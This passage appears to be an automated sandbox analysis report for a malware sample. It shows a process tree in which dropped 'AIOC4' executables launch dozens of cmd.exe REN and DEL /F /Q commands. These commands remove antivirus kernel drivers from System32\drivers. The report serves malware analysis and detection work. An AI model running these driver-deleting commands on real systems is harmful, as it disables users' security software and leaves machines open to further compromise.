PID 4548 wrote to memory of 3648	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1140	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1140	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3744	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3744	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3472	4548	AIOC4.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4080 attrib.exe

pid	process
4080	attrib.exe

C:\Users\Admin\AppData\Local\Temp\74161da72b92f3dc29efa72b75dcf86c.exe
"C:\Users\Admin\AppData\Local\Temp\74161da72b92f3dc29efa72b75dcf86c.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4728

C:\Program Files\AIOC4\StartNetApp.exe
"C:\Program Files\AIOC4\StartNetApp.exe"
2⤵
- Executes dropped EXE
- Sets file execution options in registry
- Checks computer location settings
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3616

C:\ProgramData\s_a.exe
"C:\ProgramData\s_a.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200

C:\Program Files\AIOC4\AIOC4.exe
"C:\Program Files\AIOC4\AIOC4.exe"
3⤵
- Executes dropped EXE
- Sets file execution options in registry
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove
4⤵
PID:2900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove
4⤵
PID:4544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*
4⤵
PID:3536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*
4⤵
PID:4868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove
4⤵
PID:2488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*
4⤵
PID:1648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove
4⤵
PID:868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*
4⤵
PID:1956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove
4⤵
PID:1480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*
4⤵
PID:4952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove
4⤵
PID:3276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*
4⤵
PID:2596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove
4⤵
PID:4804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*
4⤵
PID:4576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove
4⤵
PID:3460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*
4⤵
PID:1820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove
4⤵
PID:4924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*
4⤵
PID:1244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove
4⤵
PID:4856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*
4⤵
PID:1576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove
4⤵
PID:2984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*
4⤵
PID:1252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove
4⤵
PID:3396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*
4⤵
PID:4712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove
4⤵
PID:3364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*
4⤵
PID:3648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove
4⤵
PID:1140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*
4⤵
PID:3744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove
4⤵
PID:3472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*
4⤵
PID:2444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove
4⤵
PID:3876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*
4⤵
PID:2168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove
4⤵
PID:1116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*
4⤵
PID:3356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove
4⤵
PID:3000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*
4⤵
PID:3160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove
4⤵
PID:3592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*
4⤵
PID:3272

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove
4⤵
PID:396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*
4⤵
PID:5036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove
4⤵
PID:4704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*
4⤵
PID:3040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove
4⤵
PID:4072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*
4⤵
PID:3984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove
4⤵
PID:1848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*
4⤵
PID:4348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove
4⤵
PID:1420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*
4⤵
PID:4700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove
4⤵
PID:4592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*
4⤵
PID:488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove
4⤵
PID:4080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*
4⤵
PID:3164

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove
4⤵
PID:2076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*
4⤵
PID:3760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove
4⤵
PID:1944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*
4⤵
PID:3980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove
4⤵
PID:2508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*
4⤵
PID:5012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove
4⤵
PID:1136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*
4⤵
PID:3224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove
4⤵
PID:1376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*
4⤵
PID:3820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove
4⤵
PID:2432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*
4⤵
PID:4396

C:\Program Files\AIOC4\PrimaryScreen.exe
"PrimaryScreen.exe" ScaleX
4⤵
- Executes dropped EXE
PID:4776

C:\Program Files\AIOC4\AIOC4.exe
"C:\Program Files\AIOC4\AIOC4.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove
5⤵
PID:804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove
5⤵
PID:4908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*
5⤵
PID:3572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*
5⤵
PID:1404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove
5⤵
PID:1864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*
5⤵
PID:5040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove
5⤵
PID:4304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*
5⤵
PID:2776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove
5⤵
PID:1184

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*
5⤵
PID:2320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove
5⤵
PID:2572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*
5⤵
PID:2120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove
5⤵
PID:1572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*
5⤵
PID:892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove
5⤵
PID:1048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*
5⤵
PID:2508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove
5⤵
PID:1944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*
5⤵
PID:3592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove
5⤵
PID:3820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*
5⤵
PID:4396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove
5⤵
PID:1956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*
5⤵
PID:1276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove
5⤵
PID:3112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*
5⤵
PID:2192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove
5⤵
PID:5060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*
5⤵
PID:4840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove
5⤵
PID:3284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*
5⤵
PID:3088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove
5⤵
PID:2044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*
5⤵
PID:4276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove
5⤵
PID:1128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*
5⤵
PID:2280

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove
5⤵
PID:3832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*
5⤵
PID:1300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove
5⤵
PID:3316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*
5⤵
PID:4656

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove
5⤵
PID:4408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*
5⤵
PID:4576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove
5⤵
PID:3980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*
5⤵
PID:3660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove
5⤵
PID:1164

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*
5⤵
PID:3356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove
5⤵
PID:3364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*
5⤵
PID:3756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove
5⤵
PID:868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*
5⤵
PID:2412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove
5⤵
PID:4972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*
5⤵
PID:3544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove
5⤵
PID:4780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*
5⤵
PID:4192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove
5⤵
PID:4008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*
5⤵
PID:2052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove
5⤵
PID:4028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*
5⤵
PID:4052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove
5⤵
PID:1412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*
5⤵
PID:484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove
5⤵
PID:2360

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*
5⤵
PID:4068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove
5⤵
PID:2084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*
5⤵
PID:1420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove
5⤵
PID:2432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*
5⤵
PID:3536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove
5⤵
PID:1548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*
5⤵
PID:3472

C:\Program Files\AIOC4\PrimaryScreen.exe
"PrimaryScreen.exe" ScaleX
5⤵
- Executes dropped EXE
PID:1376

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C ver
5⤵
PID:2856

C:\Program Files\AIOC4\AIOC4.exe
"C:\Program Files\AIOC4\AIOC4.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove
6⤵
PID:2884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove
6⤵
PID:4020

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*
6⤵
PID:2284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*
6⤵
PID:4492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove
6⤵
PID:1960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*
6⤵
PID:3076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove
6⤵
PID:4060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*
6⤵
PID:4460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove
6⤵
PID:3684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*
6⤵
PID:3764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove
6⤵
PID:4704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*
6⤵
PID:4592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove
6⤵
PID:4464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*
6⤵
PID:756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove
6⤵
PID:924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*
6⤵
PID:4144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove
6⤵
PID:2980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*
6⤵
PID:4408

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove
6⤵
PID:1128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*
6⤵
PID:3112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove
6⤵
PID:1048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*
6⤵
PID:4192

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove
6⤵
PID:3364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*
6⤵
PID:4520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove
6⤵
PID:2304

C:\Windows\System32\cmd.exe
